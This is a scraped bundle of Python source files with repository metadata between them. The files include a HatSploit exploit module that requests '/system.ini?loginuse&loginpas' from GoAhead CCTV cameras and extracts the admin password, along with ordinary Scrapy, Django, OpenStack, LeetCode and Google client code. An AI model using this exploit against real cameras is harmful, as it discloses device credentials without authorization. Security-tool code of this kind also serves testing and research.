# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
from core.lib.module import Module
from utils.http.http import HTTPClient
from utils.string.string import StringTools
class HatSploitModule(Module, HTTPClient, StringTools):
details = {
'Name': "CCTV GoAhead Camera Password Disclosure",
'Module': "exploit/unix/cctv/goahead_password_disclosure",
'Authors': [
'Ivan Nikolsky (enty8080)',
'Pierre Kim (pierrekim)'
],
'Description': "CCTV GoAhead Camera password disclosure exploit.",
'Comments': [
''
],
'Platform': "unix",
'Risk': "high"
}
options = {
'RHOST': {
'Description': "Remote host.",
'Value': None,
'Type': "ip",
'Required': True
},
'RPORT': {
'Description': "Remote port.",
'Value': 81,
'Type': "port",
'Required': True
},
'USERNAME': {
'Description': "Default username.",
'Value': "admin",
'Type': None,
'Required': True
}
}
def exploit(self, remote_host, remote_port, username):
self.output_process("Generating payload...")
payload = '/system.ini?loginuse&loginpas'
self.output_process("Sending payload...")
response = self.http_request(
method="GET",
host=remote_host,
port=remote_port,
path=payload
)
if response is None or response.status_code != 200:
self.output_error("Failed to send payload!")
return
gathered_data = response.text
strings = self.extract_strings(gathered_data)
if username in strings:
username_index = strings.index(username)
password = strings[username_index + 1]
self.print_table("Credentials", ('Username', 'Password'), (username, password))
else:
self.output_warning(f"Target vulnerable, but default username is not {username}.")
def run(self):
remote_host, remote_port, username = self.parse_options(self.options)
self.output_process(f"Exploiting {remote_host}...")
self.exploit(remote_host, remote_port, username)
|
[
"[email protected]"
] | |
ec20e0f130c9b07be9f40df8385ecc71d1678676
|
1b3fc35ada474601a76de3c2908524336d6ca420
|
/day07/作业/tencent/tencent/settings.py
|
d96bd9dfc78cc95ce6fafa6d33a2745ee7a9c4af
|
[] |
no_license
|
dqsdatalabs/Internet-worm
|
db3677e65d11542887adcde7719b7652757a3e32
|
62f38f58b4fa7643c482077f5ae18fff6fd81915
|
refs/heads/master
| 2022-01-16T14:29:52.184528 | 2018-12-25T08:46:08 | 2018-12-25T08:46:08 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,079 |
py
|
# -*- coding: utf-8 -*-
# Scrapy settings for tencent project
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
# https://doc.scrapy.org/en/latest/topics/settings.html
# https://doc.scrapy.org/en/latest/topics/downloader-middleware.html
# https://doc.scrapy.org/en/latest/topics/spider-middleware.html
BOT_NAME = 'tencent'
SPIDER_MODULES = ['tencent.spiders']
NEWSPIDER_MODULE = 'tencent.spiders'
# Crawl responsibly by identifying yourself (and your website) on the user-agent
#USER_AGENT = 'tencent (+http://www.yourdomain.com)'
# Obey robots.txt rules
ROBOTSTXT_OBEY = False
# Configure maximum concurrent requests performed by Scrapy (default: 16)
#CONCURRENT_REQUESTS = 32
# Configure a delay for requests for the same website (default: 0)
# See https://doc.scrapy.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
#DOWNLOAD_DELAY = 3
# The download delay setting will honor only one of:
#CONCURRENT_REQUESTS_PER_DOMAIN = 16
#CONCURRENT_REQUESTS_PER_IP = 16
# Disable cookies (enabled by default)
COOKIES_ENABLED = False
# Disable Telnet Console (enabled by default)
#TELNETCONSOLE_ENABLED = False
# Override the default request headers:
#DEFAULT_REQUEST_HEADERS = {
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Accept-Language': 'en',
#}
# Enable or disable spider middlewares
# See https://doc.scrapy.org/en/latest/topics/spider-middleware.html
#SPIDER_MIDDLEWARES = {
# 'tencent.middlewares.TencentSpiderMiddleware': 543,
#}
# Enable or disable downloader middlewares
# See https://doc.scrapy.org/en/latest/topics/downloader-middleware.html
#DOWNLOADER_MIDDLEWARES = {
# 'tencent.middlewares.TencentDownloaderMiddleware': 543,
#}
# Enable or disable extensions
# See https://doc.scrapy.org/en/latest/topics/extensions.html
#EXTENSIONS = {
# 'scrapy.extensions.telnet.TelnetConsole': None,
#}
# Configure item pipelines
# See https://doc.scrapy.org/en/latest/topics/item-pipeline.html
ITEM_PIPELINES = {
'tencent.pipelines.TencentPipeline': 300,
}
# Enable and configure the AutoThrottle extension (disabled by default)
# See https://doc.scrapy.org/en/latest/topics/autothrottle.html
#AUTOTHROTTLE_ENABLED = True
# The initial download delay
#AUTOTHROTTLE_START_DELAY = 5
# The maximum download delay to be set in case of high latencies
#AUTOTHROTTLE_MAX_DELAY = 60
# The average number of requests Scrapy should be sending in parallel to
# each remote server
#AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0
# Enable showing throttling stats for every response received:
#AUTOTHROTTLE_DEBUG = False
# Enable and configure HTTP caching (disabled by default)
# See https://doc.scrapy.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
#HTTPCACHE_ENABLED = True
#HTTPCACHE_EXPIRATION_SECS = 0
#HTTPCACHE_DIR = 'httpcache'
#HTTPCACHE_IGNORE_HTTP_CODES = []
#HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'
|
[
"[email protected]"
] | |
a7eaaf704b1ca43d729d3db96987a74947dc2a7e
|
ac42f1d918bdbd229968cea0954ed75250acd55c
|
/admin/dashboard/openstack_dashboard/dashboards/admin/networks/urls.py
|
4cd1b60079c3d722609128d7ad46956075f117f1
|
[
"Apache-2.0"
] |
permissive
|
naanal/product
|
016e18fd2f35608a0d8b8e5d2f75b653bac7111a
|
bbaa4cd60d4f2cdda6ce4ba3d36312c1757deac7
|
refs/heads/master
| 2020-04-03T22:40:48.712243 | 2016-11-15T11:22:00 | 2016-11-15T11:22:00 | 57,004,514 | 1 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,206 |
py
|
# Copyright 2012 NEC Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.conf.urls import include
from django.conf.urls import url
from openstack_dashboard.dashboards.admin.networks.agents \
import views as agent_views
from openstack_dashboard.dashboards.admin.networks.ports \
import urls as port_urls
from openstack_dashboard.dashboards.admin.networks.ports \
import views as port_views
from openstack_dashboard.dashboards.admin.networks.subnets \
import urls as subnet_urls
from openstack_dashboard.dashboards.admin.networks.subnets \
import views as subnet_views
from openstack_dashboard.dashboards.admin.networks import views
NETWORKS = r'^(?P<network_id>[^/]+)/%s$'
urlpatterns = [
url(r'^$', views.IndexView.as_view(), name='index'),
url(r'^create/$', views.CreateView.as_view(), name='create'),
url(NETWORKS % 'update', views.UpdateView.as_view(), name='update'),
url(NETWORKS % 'detail', views.DetailView.as_view(), name='detail'),
url(NETWORKS % 'agents/add',
agent_views.AddView.as_view(), name='adddhcpagent'),
url(NETWORKS % 'subnets/create',
subnet_views.CreateView.as_view(), name='addsubnet'),
url(NETWORKS % 'ports/create',
port_views.CreateView.as_view(), name='addport'),
url(r'^(?P<network_id>[^/]+)/subnets/(?P<subnet_id>[^/]+)/update$',
subnet_views.UpdateView.as_view(), name='editsubnet'),
url(r'^(?P<network_id>[^/]+)/ports/(?P<port_id>[^/]+)/update$',
port_views.UpdateView.as_view(), name='editport'),
url(r'^subnets/', include(subnet_urls, namespace='subnets')),
url(r'^ports/', include(port_urls, namespace='ports')),
]
|
[
"[email protected]"
] | |
3ca35f3537a824472f63b7833626c34abcf1e3e6
|
befafdde28c285c049b924fa58ce6240a4ae8d3c
|
/python_solution/Backtracking/40_CombinationSumII.py
|
3c2f5d5b703d0d38f2bbe30c891c104f20adad1e
|
[] |
no_license
|
Dimen61/leetcode
|
3364369bda2255b993581c71e2b0b84928e817cc
|
052bd7915257679877dbe55b60ed1abb7528eaa2
|
refs/heads/master
| 2020-12-24T11:11:10.663415 | 2017-08-15T14:54:41 | 2017-08-15T14:54:41 | 73,179,221 | 4 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,530 |
py
|
class Solution(object):
def combinationSum2(self, candidates, target):
"""
:type candidates: List[int]
:type target: int
:rtype: List[List[int]]
"""
enable_lst = [False for i in range(target+1)]
enable_lst[0] = True
candidates.sort()
for i in range(target):
if enable_lst[i]:
for num in candidates:
if i+num <= target:
enable_lst[i+num] = True
if not enable_lst[target]: return []
tmp_result = []
def search(total, index, combs):
"""
:type total: int
:type index: int
:rtype: void
"""
if total == 0:
tmp_result.append(combs)
return
elif index >= len(candidates) or total < 0:
return
num = candidates[index]
if total-num >= 0 and enable_lst[total-num]:
search(total-num, index+1, combs+[num])
search(total, index+1, combs)
search(target, 0, [])
tmp_result.sort()
result = []
last = None
for item in tmp_result:
if not last:
last = item
result.append(item)
else:
if last != item:
last = item
result.append(item)
return result
|
[
"[email protected]"
] | |
8c951a4ff5799e9f19a66c7679c2cbb6760522b1
|
593ecc21a7164ec293f23d75423e71ab3d9f3c54
|
/LC29.py
|
4851f8eb59c6ba7f464b3e832b78b17bb3b30c3a
|
[] |
no_license
|
luckmimi/leetcode
|
e297c11960f0c72370523e5594d789bc4d55cf7c
|
2257c6202e823a5cd71b630441c430f1bd08a896
|
refs/heads/master
| 2022-07-11T22:36:02.634148 | 2022-06-30T22:57:20 | 2022-06-30T22:57:20 | 214,880,666 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 516 |
py
|
class Solution:
def divide(self, dividend: int, divisor: int) -> int:
sign = -1 if (dividend < 0) ^ (divisor < 0) else 1
a = abs(dividend)
b = abs(divisor)
res = 0
while b<= a:
mul = 1
tmp = b
while a >= (tmp <<1):
tmp <<= 1
mul <<= 1
res += mul
a -= tmp
res *= sign
if res > 2**31 -1 :
return 2** 31 -1
else:
return res
|
[
"[email protected]"
] | |
5fd1184dce2377d92e2ff473b987d718c97bf42f
|
5bd3122d230471b048429f5e9c49a0b39c8a54fc
|
/Atcoder_contests/ARC/R102A.py
|
5e0b5a9bf32372b1adfd5381f0b6c1bc75432986
|
[] |
no_license
|
nao1412/Competitive_Programing_Codes
|
e230e2fa85027e41c5ee062083801bb299effe9b
|
98c29b5ba75e75502cf27fcf365a7aedcd6c273c
|
refs/heads/main
| 2023-06-05T18:45:59.733301 | 2021-06-23T15:02:25 | 2021-06-23T15:02:25 | 374,061,897 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 541 |
py
|
import sys
sys.setrecursionlimit(10**7) # 再帰回数を増やす
import math
def I(): return int(input())
def LI(): return list(map(int, input().split()))
def MI(): return map(int, input().split())
def S(): return input()
def LS(): return list(map(str, input().split()))
def H(n): return [input() for i in range(n)]
mod = 10**9 + 7
def main():
n, k = MI()
if k % 2 == 0:
n1 = n // k
n2 = n1
if n % k >= k // 2:
n2 = n1 + 1
else:
n1 = n // k
n2 = 0
print(n1**3+n2**3)
if __name__ == '__main__':
main()
|
[
"[email protected]"
] | |
b78816d355385165c2d46725802b6c6001eae314
|
b1c99061474c4e2f2653f6f3d83931c949c58b13
|
/Basic/chapter3/ReplaceTest.py
|
1f7aca0428b31758f691b5eb62156031c05dd93f
|
[] |
no_license
|
hyperaeon/python
|
df75346040a5ccc588e21b0d761493c59e1a4fe3
|
21d10ef7af3227d29092a6720666c0db8e418ec4
|
refs/heads/master
| 2016-09-14T08:58:53.794960 | 2016-04-26T05:34:56 | 2016-04-26T05:34:56 | 57,100,745 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 222 |
py
|
__author__ = 'hzliyong'
cookie = '_da_ntes_uid=3LhpAfObU48aiOR0b28yZYXv;'
cookie = cookie.replace(';','')
print(cookie)
list
type = 'a'
if type == 'a':
list = 'type a'
if type == 'b':
list = 'type b'
print(list)
|
[
"[email protected]"
] | |
b7b297c84c0c3d1db89a06f2929ee93d987e0691
|
eab1abf41e3e1bd276258be7aedfb4f2dfcc1b1e
|
/web/mydjango/geoapp/admin.py
|
3d75606cf3e3ff9b2630865dc8782c03b65cc335
|
[] |
no_license
|
javiermaly/docker-python3-django2-postgres-postgis-geodjango-nginx
|
1732e0df8d1bd4624b3385ac6757b48060814814
|
8ea5f2c9ed90013bab76b468d44e7cbabf8122f6
|
refs/heads/master
| 2021-11-25T14:47:09.901801 | 2018-03-26T01:03:39 | 2018-03-26T01:03:39 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 186 |
py
|
from django.contrib import admin
from .models import GeoAlgo
@admin.register(GeoAlgo)
class GeoAlgoAdmin(admin.ModelAdmin):
list_display = ['nombre']
search_fields = ['nombre']
|
[
"[email protected]"
] | |
3c0948318554ab6edf9a4f53a5192b3d04e696dd
|
a4ea525e226d6c401fdb87a6e9adfdc5d07e6020
|
/src/azure-cli/azure/cli/command_modules/network/aaz/profile_2018_03_01_hybrid/network/vnet_gateway/_list_learned_routes.py
|
789b238597180231c9dcdc90049d592a0ae04769
|
[
"MIT",
"BSD-3-Clause",
"LGPL-2.0-or-later",
"GPL-1.0-or-later",
"MPL-2.0",
"LGPL-2.1-only",
"Apache-2.0",
"LGPL-2.1-or-later",
"BSD-2-Clause"
] |
permissive
|
Azure/azure-cli
|
13340eeca2e288e66e84d393fa1c8a93d46c8686
|
a40fd14ad0b6e89720a2e58d4d9be3a6ce1535ca
|
refs/heads/dev
| 2023-08-17T06:25:37.431463 | 2023-08-17T06:00:10 | 2023-08-17T06:00:10 | 51,040,886 | 4,018 | 3,310 |
MIT
| 2023-09-14T11:11:05 | 2016-02-04T00:21:51 |
Python
|
UTF-8
|
Python
| false | false | 6,877 |
py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
#
# Code generated by aaz-dev-tools
# --------------------------------------------------------------------------------------------
# pylint: skip-file
# flake8: noqa
from azure.cli.core.aaz import *
@register_command(
"network vnet-gateway list-learned-routes",
)
class ListLearnedRoutes(AAZCommand):
"""This operation retrieves a list of routes the virtual network gateway has learned, including routes learned from BGP peers.
:example: Retrieve a list of learned routes.
az network vnet-gateway list-learned-routes -g MyResourceGroup -n MyVnetGateway
"""
_aaz_info = {
"version": "2017-10-01",
"resources": [
["mgmt-plane", "/subscriptions/{}/resourcegroups/{}/providers/microsoft.network/virtualnetworkgateways/{}/getlearnedroutes", "2017-10-01"],
]
}
AZ_SUPPORT_NO_WAIT = True
def _handler(self, command_args):
super()._handler(command_args)
return self.build_lro_poller(self._execute_operations, self._output)
_args_schema = None
@classmethod
def _build_arguments_schema(cls, *args, **kwargs):
if cls._args_schema is not None:
return cls._args_schema
cls._args_schema = super()._build_arguments_schema(*args, **kwargs)
# define Arg Group ""
_args_schema = cls._args_schema
_args_schema.resource_group = AAZResourceGroupNameArg(
required=True,
)
_args_schema.name = AAZStrArg(
options=["-n", "--name"],
help="Name of the VNet gateway.",
required=True,
id_part="name",
)
return cls._args_schema
def _execute_operations(self):
self.pre_operations()
yield self.VirtualNetworkGatewaysGetLearnedRoutes(ctx=self.ctx)()
self.post_operations()
@register_callback
def pre_operations(self):
pass
@register_callback
def post_operations(self):
pass
def _output(self, *args, **kwargs):
result = self.deserialize_output(self.ctx.vars.instance, client_flatten=True)
return result
class VirtualNetworkGatewaysGetLearnedRoutes(AAZHttpOperation):
CLIENT_TYPE = "MgmtClient"
def __call__(self, *args, **kwargs):
request = self.make_request()
session = self.client.send_request(request=request, stream=False, **kwargs)
if session.http_response.status_code in [202]:
return self.client.build_lro_polling(
self.ctx.args.no_wait,
session,
self.on_200,
self.on_error,
lro_options={"final-state-via": "location"},
path_format_arguments=self.url_parameters,
)
if session.http_response.status_code in [200]:
return self.client.build_lro_polling(
self.ctx.args.no_wait,
session,
self.on_200,
self.on_error,
lro_options={"final-state-via": "location"},
path_format_arguments=self.url_parameters,
)
return self.on_error(session.http_response)
@property
def url(self):
return self.client.format_url(
"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworkGateways/{virtualNetworkGatewayName}/getLearnedRoutes",
**self.url_parameters
)
@property
def method(self):
return "POST"
@property
def error_format(self):
return "MgmtErrorFormat"
@property
def url_parameters(self):
parameters = {
**self.serialize_url_param(
"resourceGroupName", self.ctx.args.resource_group,
required=True,
),
**self.serialize_url_param(
"subscriptionId", self.ctx.subscription_id,
required=True,
),
**self.serialize_url_param(
"virtualNetworkGatewayName", self.ctx.args.name,
required=True,
),
}
return parameters
@property
def query_parameters(self):
parameters = {
**self.serialize_query_param(
"api-version", "2017-10-01",
required=True,
),
}
return parameters
@property
def header_parameters(self):
parameters = {
**self.serialize_header_param(
"Accept", "application/json",
),
}
return parameters
def on_200(self, session):
data = self.deserialize_http_content(session)
self.ctx.set_var(
"instance",
data,
schema_builder=self._build_schema_on_200
)
_schema_on_200 = None
@classmethod
def _build_schema_on_200(cls):
if cls._schema_on_200 is not None:
return cls._schema_on_200
cls._schema_on_200 = AAZObjectType()
_schema_on_200 = cls._schema_on_200
_schema_on_200.value = AAZListType()
value = cls._schema_on_200.value
value.Element = AAZObjectType()
_element = cls._schema_on_200.value.Element
_element.as_path = AAZStrType(
serialized_name="asPath",
flags={"read_only": True},
)
_element.local_address = AAZStrType(
serialized_name="localAddress",
flags={"read_only": True},
)
_element.network = AAZStrType(
flags={"read_only": True},
)
_element.next_hop = AAZStrType(
serialized_name="nextHop",
flags={"read_only": True},
)
_element.origin = AAZStrType(
flags={"read_only": True},
)
_element.source_peer = AAZStrType(
serialized_name="sourcePeer",
flags={"read_only": True},
)
_element.weight = AAZIntType(
flags={"read_only": True},
)
return cls._schema_on_200
class _ListLearnedRoutesHelper:
"""Helper class for ListLearnedRoutes"""
__all__ = ["ListLearnedRoutes"]
|
[
"[email protected]"
] | |
e7d33cb382cca997ef56c3849ba3489bc73be785
|
fd90b8efa1daaec44b54797e549e0f738f4a5897
|
/jianzhioffer/16. 数值的整数次方.py
|
b6c886f4358eab1f50ae4aa820f45932b011e28a
|
[] |
no_license
|
ddz-mark/LeetCode
|
2a622eeb655398ca9ebd9feee93a52cd114a77c4
|
d557faf87374ad8c65634ee9d9e572b88a54913a
|
refs/heads/master
| 2021-07-12T06:58:57.162657 | 2021-04-18T13:25:03 | 2021-04-18T13:25:03 | 244,403,881 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,809 |
py
|
# 实现函数double Power(double base, int exponent),求base的exponent次方。不得使用库函数,同时不需要考虑大数问题。
#
# 示例 1:
#
# 输入: 2.00000, 10
# 输出: 1024.00000
# 示例 2:
#
# 输入: 2.10000, 3
# 输出: 9.26100
# 示例 3:
#
# 输入: 2.00000, -2
# 输出: 0.25000
# 解释: 2-2 = 1/22 = 1/4 = 0.25
# 思路一:优化方法,将指数分为奇数和偶数,偶数的话可以 x=x*x
# 判断奇偶的方法:对于(m+n) & 1,若结果为0,则(m+n)是偶数;若结果为1,则(m+n)为奇数;
# 递归思想:可以从后面往前面退,比如:
# 奇数的时候:return x * getPow(x, n-1)
# 偶数的时候:return getPow(x * x, n // 2)
class Solution(object):
def myPow(self, x, n):
"""
:type x: float
:type n: int
:rtype: float
"""
# 1. 迭代版本
# n_temp = abs(n)
# sum = 1
# while n_temp > 1:
#
# if n_temp & 1 == 0: # 偶数
# x = x * x
# n_temp = n_temp // 2
# else:
# sum = sum * x
# n_temp -= 1
# sum = sum * x
#
# if n < 0:
# return 1 / sum
# elif n ==0:
# return 1
# return sum
# 2. 递归版本
if n == 0:
return 1
elif n > 0:
return self.getPow(x, n)
else:
return self.getPow(1/x, -n)
def getPow(self, x, n):
# 递归算法,先写结束条件
if n == 1:
return x
if n & 1 == 0: # 偶数
return self.getPow(x * x, n // 2)
else:
return x * self.getPow(x, n-1)
if __name__ == '__main__':
ob = Solution()
print(ob.myPow(2.0, 3))
|
[
"[email protected]"
] | |
a30be694eca63a88eff2b727822bab6367cf71fe
|
d0dfd680e92e9b32f24e6e034571ad4323a58103
|
/src/yeahml/information/write_info.py
|
e25421e67c2746d55a8337851f10397129d59851
|
[
"Apache-2.0"
] |
permissive
|
yeahml/yeahml
|
6d1523d01300532f19c54d8e9c320420df66ee5c
|
b51faff6625db5980151a4a5fac7bb49313df5c1
|
refs/heads/master
| 2023-08-11T16:49:41.181953 | 2020-11-14T20:33:58 | 2020-11-14T20:33:58 | 137,613,449 | 4 | 1 |
Apache-2.0
| 2023-06-02T18:45:48 | 2018-06-16T22:11:19 |
Python
|
UTF-8
|
Python
| false | false | 1,138 |
py
|
import json
import pathlib
from typing import Any, Dict
def write_build_information(
model_cdict: Dict[str, Any], meta_cdict: Dict[str, Any]
) -> bool:
full_exp_path = (
pathlib.Path(meta_cdict["yeahml_dir"])
.joinpath(meta_cdict["data_name"])
.joinpath(meta_cdict["experiment_name"])
)
json_path = pathlib.Path(full_exp_path).joinpath("info.json")
data_to_write = {}
KEYS_TO_WRITE = ["model_hash"]
if pathlib.Path(json_path).exists():
with open(json_path) as json_file:
data = json.load(json_file)
for k in KEYS_TO_WRITE:
if not k == "model_hash" and not meta_cdict["name_overwrite"]:
assert (
data[k] == model_cdict[k]
), f"info at {json_path} already contains the same values for keys {k}, but {json_path}={data[k]} and model config = {model_cdict[k]}\n > possible solution: change the name of the current model?"
for k in KEYS_TO_WRITE:
data_to_write[k] = model_cdict[k]
with open(json_path, "w") as outfile:
json.dump(data_to_write, outfile)
return True
|
[
"[email protected]"
] | |
f60472dc9f2c47ee9077d7de07554b3dae6f0215
|
5c72f7709e501bd0ca3c5dc1e1f21cfffda13582
|
/rebench/model/measurement.py
|
40af4d69df6564115af83afce35a6769e7585c55
|
[] |
no_license
|
lhoste-bell/ReBench
|
74ccb400aa5f262b56659afac3b7db873bd6a8d2
|
0f5c678b045b5208e9a2bed01629c780bef52da5
|
refs/heads/master
| 2021-01-17T07:57:14.440676 | 2016-05-23T19:25:58 | 2016-05-23T19:25:58 | 60,706,933 | 0 | 0 | null | 2016-06-08T15:06:26 | 2016-06-08T15:06:25 | null |
UTF-8
|
Python
| false | false | 2,563 |
py
|
# Copyright (c) 2009-2014 Stefan Marr <http://www.stefan-marr.de/>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from datetime import datetime
from .run_id import RunId
class Measurement(object):
def __init__(self, value, unit, run_id, criterion = 'total',
timestamp = None):
self._run_id = run_id
self._criterion = criterion
self._value = value
self._unit = unit
self._timestamp = timestamp or datetime.now()
def is_total(self):
return self._criterion == 'total'
@property
def criterion(self):
return self._criterion
@property
def value(self):
return self._value
@property
def unit(self):
return self._unit
@property
def timestamp(self):
return self._timestamp
@property
def run_id(self):
return self._run_id
TIME_FORMAT = "%Y-%m-%dT%H:%M:%S"
def as_str_list(self):
return ["[" + self._timestamp.strftime(self.TIME_FORMAT) + "]",
"%f" % self._value,
self._unit,
self._criterion] + self._run_id.as_str_list()
@classmethod
def from_str_list(cls, data_store, str_list):
timestamp = datetime.strptime(str_list[0][1:-1], cls.TIME_FORMAT)
value = float(str_list[1])
unit = str_list[2]
criterion = str_list[3]
run_id = RunId.from_str_list(data_store, str_list[4:])
return Measurement(value, unit, run_id, criterion, timestamp)
|
[
"[email protected]"
] | |
ce4e263dde23b1fdcc64494a2f9403ddfdfb1d07
|
f5f40cee05de885ee059bcf4760e16f3f01ed23c
|
/ims/exceptions.py
|
c359b0a8626603fd8084e35af12b1dcce84a8c5e
|
[] |
no_license
|
MarsWizard/imagebank
|
68693207d71024bd0cdc608984d80fc0c7b6f751
|
916a9f087194052e77751fd8d52c930e77a7b04d
|
refs/heads/master
| 2021-04-17T16:57:55.356760 | 2020-10-20T05:34:23 | 2020-10-20T05:34:23 | 249,460,889 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 452 |
py
|
ERROR_OBJECT_NOT_FOUND = 10001
PARAMETER_REQUIRED = 10002
INVALID_IMAGE_FILE = 10003
class ImsException(BaseException):
def __init__(self, error_code, error_msg):
self.error_code = error_code
self.error_msg = error_msg
class InvalidImageFile(ImsException):
def __init__(self):
super(InvalidImageFile, self).__init__(INVALID_IMAGE_FILE,
'Invalid Image File')
|
[
"[email protected]"
] | |
477f89560ab67fce9dddcc436863915129dc25bd
|
707bd0e873ae25146f1341b40d8efbf5134025af
|
/unifypage/migrations/0004_auto_20161021_0933.py
|
781e95f7baa886a438135233d4469070f9415423
|
[] |
no_license
|
yosmangel/djangoLn2x
|
76acd748adfddb5b21ad3e0342e3d7eb19b81bc9
|
24d068458e8271aacfa98d762c0dc117e65d41cf
|
refs/heads/master
| 2021-04-27T07:55:36.488176 | 2017-06-01T17:48:26 | 2017-06-01T17:48:26 | 122,641,881 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 600 |
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2016-10-21 08:33
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('unifypage', '0003_auto_20161020_1746'),
]
operations = [
migrations.RemoveField(
model_name='row',
name='background_url',
),
migrations.AddField(
model_name='row',
name='background',
field=models.CharField(blank=True, max_length=500, verbose_name='Background'),
),
]
|
[
"[email protected]"
] | |
f2b7180d176b4eec46c3794ea9526f5ec48beb91
|
228ebc9fb20f25dd3ed2a6959aac41fd31314e64
|
/google/cloud/aiplatform_v1beta1/services/migration_service/transports/base.py
|
3405e5f21603a2bae9a6b0b1b8a675b832545a71
|
[
"Apache-2.0"
] |
permissive
|
orionnye/python-aiplatform
|
746e3df0c75025582af38223829faeb2656dc653
|
e3ea683bf754832340853a15bdb0a0662500a70f
|
refs/heads/main
| 2023-08-03T06:14:50.689185 | 2021-09-24T03:24:14 | 2021-09-24T03:24:14 | 410,091,957 | 1 | 0 |
Apache-2.0
| 2021-09-24T20:21:01 | 2021-09-24T20:21:00 | null |
UTF-8
|
Python
| false | false | 7,763 |
py
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import abc
from typing import Awaitable, Callable, Dict, Optional, Sequence, Union
import packaging.version
import pkg_resources
import google.auth # type: ignore
import google.api_core # type: ignore
from google.api_core import exceptions as core_exceptions # type: ignore
from google.api_core import gapic_v1 # type: ignore
from google.api_core import retry as retries # type: ignore
from google.api_core import operations_v1 # type: ignore
from google.auth import credentials as ga_credentials # type: ignore
from google.oauth2 import service_account # type: ignore
from google.cloud.aiplatform_v1beta1.types import migration_service
from google.longrunning import operations_pb2 # type: ignore
try:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(
gapic_version=pkg_resources.get_distribution(
"google-cloud-aiplatform",
).version,
)
except pkg_resources.DistributionNotFound:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo()
try:
# google.auth.__version__ was added in 1.26.0
_GOOGLE_AUTH_VERSION = google.auth.__version__
except AttributeError:
try: # try pkg_resources if it is available
_GOOGLE_AUTH_VERSION = pkg_resources.get_distribution("google-auth").version
except pkg_resources.DistributionNotFound: # pragma: NO COVER
_GOOGLE_AUTH_VERSION = None
class MigrationServiceTransport(abc.ABC):
"""Abstract transport class for MigrationService."""
AUTH_SCOPES = ("https://www.googleapis.com/auth/cloud-platform",)
DEFAULT_HOST: str = "aiplatform.googleapis.com"
def __init__(
self,
*,
host: str = DEFAULT_HOST,
credentials: ga_credentials.Credentials = None,
credentials_file: Optional[str] = None,
scopes: Optional[Sequence[str]] = None,
quota_project_id: Optional[str] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
always_use_jwt_access: Optional[bool] = False,
**kwargs,
) -> None:
"""Instantiate the transport.
Args:
host (Optional[str]):
The hostname to connect to.
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
